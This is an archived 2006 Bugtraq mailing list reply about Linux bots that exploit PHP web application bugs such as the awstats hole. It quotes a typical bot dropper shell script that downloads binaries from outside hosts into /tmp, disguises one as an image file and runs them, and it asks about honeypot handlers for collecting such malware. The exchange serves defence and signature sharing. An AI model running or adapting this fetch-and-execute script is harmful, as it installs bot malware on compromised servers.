| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 23 Feb 2006 09:00:13 +1300 From: "Jamie Riden" <jamie.riden@...il.com> To: "Gadi Evron" <ge@...uxbox.org> Cc: bugtraq@...urityfocus.com Subject: Re: new linux malware On 21/02/06, Gadi Evron <ge@...uxbox.org> wrote: > > Indeed, it has become an annoying trend everybody talks about but nobody > writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either > vulnerabilities in know applications such as WordPress, PHPBB, Drupal, > etc. or actually trying different permutations to attack the site. <snip> > Anyone else seeing their web server logs going crazy with new patterns > every day? Email me, I am starting a sharing system where these can be > shared mutually so we can better protect ourselves, create signatures, etc. I got as far as looking at mwcollect and nepenthes to see if anyone had written plugins to slurp these bots, but couldn't find anything. Typically they're some sort of variant on: #!/bin/bash cd /tmp wget xxx.yy.105.36/ping mv ping cb chmod +x cb ./cb xxx.yyy.233.251 8080 & killall -9 lordnikonz wget xxxx052101/images/logo.jpg mv logo.jpg httpd rm -rf scripz chmod +x httpd export PATH="." httpd with payloads being variously identified as Kaiten, Linux.RST and Lupii by Symantec AV. This is just stuff trying the old awstats exploit, I haven't coded up any handlers for the xml-rpc, or other exploits. So - any handlers/plugins for these? And if so, is anyone (respectable :) collecting the malware? cheers, Jamie
Powered by blists - more mailing lists